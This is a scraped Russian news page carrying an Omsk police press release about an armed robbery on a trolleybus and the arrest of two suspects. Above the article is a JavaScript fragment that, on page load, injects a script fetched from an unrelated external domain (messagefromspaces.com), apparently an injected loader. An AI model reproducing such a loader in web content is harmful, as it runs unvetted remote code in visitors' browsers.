, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 23 июля, 2018 года
23 декабря, 2012 Криминал

Омские полицейские раскрыли разбойное нападение в салоне троллейбуса

22 декабря около 21:30 часов в дежурную часть ОП №2 поступило сообщение о разбойном нападении в салоне троллейбуса.

Прибыв на место преступления (ул. Ватутина в Кировском округе), следственно-оперативной группой было установлено, что жертвой злоумышленников стал 24-летний омич, который рассказал полицейским, что двое неизвестных мужчин, находясь в салоне троллейбуса и угрожая оружием, открыто похитили у него документы, банковскую карту, деньги в размере 5 000 рублей и сотовый телефон.

Также оперативники выяснили, что преступление совершалось в момент, когда троллейбус уже направлялся в депо, кондуктор вышел, а других пассажиров, кроме потерпевшего, не было.

Полученная информация с приметами нападавших стражи порядка незамедлительно передали всем автопатрулям комплексных сил полиции.  В 22:20 часов их задержали. У одного в ходе личного досмотра был обнаружен пистолет, схожий с пневматическим, а также похищенное имущество. В настоящее время оно возвращено владельцу.

Сотрудники полиции опросили задержанных и установили их личности. Оба являются жителями г. Омска, 1981 и 1986 гг.р., ранее неоднократно привлекались к уголовной ответственности. Оружие они приобрели на рынке после того, как уволились из одной омской фирмы, где вместе работали.

По данному факту следственным отделом ОП № 2 УМВД России по г. Омску  в отношении подозреваемых возбуждено уголовное дело по ч. 2 ст. 162 УК РФ «Разбой, совершенный группой лиц по предварительному сговору, а равно с применением оружия или предметов, используемых в качестве оружия».

Изъятый пистолет направлен на экспертизу, по результатам которой станет известно, к какой категории оружия он относится.

Пресс-служба УМВД России по городу Омску

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Криминал